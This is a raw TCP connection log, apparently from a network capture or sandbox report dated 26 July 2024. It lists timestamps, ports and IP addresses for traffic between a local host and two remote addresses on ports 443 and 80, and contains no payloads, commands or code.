Jul 26, 2024 21:01:33.730274916 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.730429888 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.730453014 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.730460882 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.730529070 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.730529070 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.731352091 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.731414080 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.731420994 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.731482029 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.732016087 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.732057095 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.732110977 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.732110977 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.732116938 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.732183933 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.732903957 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.733056068 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.776832104 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.776976109 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.792689085 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.792850971 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.793533087 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.793715954 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.803719044 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.803803921 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.817039967 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.817148924 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.817563057 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.817771912 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.818007946 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.818114996 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.818538904 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.818623066 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.819466114 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.819550991 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.820060968 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.820152998 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.820178032 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.820246935 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.823721886 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.823807955 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.824073076 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.824243069 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.824316978 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.824385881 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.824428082 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.824515104 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.824630976 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.824717045 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.866060972 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.866183996 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.880631924 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.880846977 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.881483078 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.881649971 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.890645981 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.890789986 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.905323029 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.905607939 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.905608892 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.905620098 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.905704975 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.905920982 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.906507969 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.906594992 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.906665087 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.906672001 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.906677961 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.906747103 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.907538891 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.907582998 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.907633066 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.907633066 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.907644033 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.907682896 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.908579111 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.908649921 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.908664942 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.908674002 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.908721924 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.908721924 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.909455061 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.910028934 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.910373926 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.910424948 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.910474062 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.910474062 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.910484076 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.910985947 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.952399015 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.952502012 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.967597961 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.967763901 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.967860937 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.967952967 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.969103098 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.969176054 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.978485107 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.979207993 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.992829084 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.993005991 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.993168116 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.993762970 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.993768930 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.993784904 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.993837118 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.993865013 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.993874073 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.993913889 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.993913889 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.994435072 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.994822979 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.994832039 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.994843960 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.995070934 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.995414019 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.995452881 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.995480061 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.995487928 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.995524883 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.995524883 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.996190071 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.996257067 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.996273041 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.996280909 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.996414900 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.997345924 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.997402906 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.997462988 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.997462988 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.997471094 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.997613907 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.054339886 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.054475069 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.074474096 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.074599981 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.074611902 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.074628115 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.074670076 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.074670076 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.076122046 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.076190948 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.080689907 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.081012011 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.081032038 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.081235886 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.081288099 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.081288099 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.081296921 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.081465006 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.081634045 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.081722975 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.081753969 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.082045078 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.082232952 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.082379103 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.082559109 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.082958937 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.083022118 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.083022118 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.083036900 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.083163023 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.083302975 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.083450079 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.083645105 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.083839893 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.083955050 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.084351063 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.084405899 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.084405899 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.084418058 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.084474087 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.134298086 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.134407997 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.156949997 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.157068014 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.157087088 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.157216072 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.163274050 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.163363934 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.169171095 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.169260979 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.169533014 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.169629097 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.169657946 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.169667959 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.169692993 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.169732094 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.170422077 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.170504093 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.170531034 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.170536041 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.170572996 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.170572996 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.171291113 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.171397924 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.171412945 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.172133923 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.172152042 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.172158003 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.172209024 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.172209024 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.172243118 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.172302961 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.172941923 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.173340082 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.173358917 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.173363924 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.173413992 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.173413992 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.173998117 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.174240112 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.222414017 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.223253012 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.244570971 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.244677067 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.244719028 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.244803905 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.245426893 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.245562077 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.251070976 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.251365900 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.256793022 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.257005930 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.257092953 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.257265091 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.257582903 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.257834911 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.258117914 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.258284092 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.258341074 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.258341074 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.258354902 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.259084940 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.259149075 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.259149075 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.259157896 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.259171009 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.259233952 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.259233952 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.259241104 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.259309053 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.259958029 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.259963989 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.259974957 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.260032892 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.260032892 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.260039091 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.260622978 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.260720015 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.260727882 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.260768890 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.261408091 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.261461973 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.261789083 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.261840105 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.312726021 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.313036919 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.334328890 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.334435940 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.334563017 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.334655046 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.338228941 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.338495016 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.344491959 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.344822884 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.344893932 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.344893932 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.344909906 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.345031977 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.345542908 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.345599890 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.345599890 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.345608950 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.345644951 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.345705032 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.345705032 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.345712900 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.345999956 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.346041918 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.346055031 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.346055031 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.346060991 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.346111059 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.346111059 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.350591898 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.350759029 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.350826979 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.350935936 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.351119041 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.351166010 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.351212978 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.351212978 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.351221085 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.351243019 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.351293087 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.351356030 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.351356030 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:34.351371050 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:34.351485968 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:35.108325958 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:35.108614922 CEST	49762	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:35.113562107 CEST	80	49762	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:35.113673925 CEST	49762	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:35.113809109 CEST	49762	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:35.114234924 CEST	80	49759	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:35.114337921 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:35.118961096 CEST	80	49762	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:35.996160984 CEST	80	49762	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:35.996299982 CEST	49762	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:36.107774973 CEST	49762	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:36.108129025 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:36.113761902 CEST	80	49763	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:36.113775969 CEST	80	49762	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:36.113881111 CEST	49762	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:36.113893032 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:36.114119053 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:36.119199038 CEST	80	49763	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:37.027251959 CEST	80	49763	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:37.027448893 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.028063059 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.032929897 CEST	80	49763	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:37.286619902 CEST	80	49763	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:37.286833048 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.389208078 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.389493942 CEST	49764	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.394968033 CEST	80	49764	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:37.395066977 CEST	49764	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.395983934 CEST	80	49763	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:37.396045923 CEST	49763	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.396255016 CEST	49764	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:37.401086092 CEST	80	49764	185.215.113.19	192.168.2.4
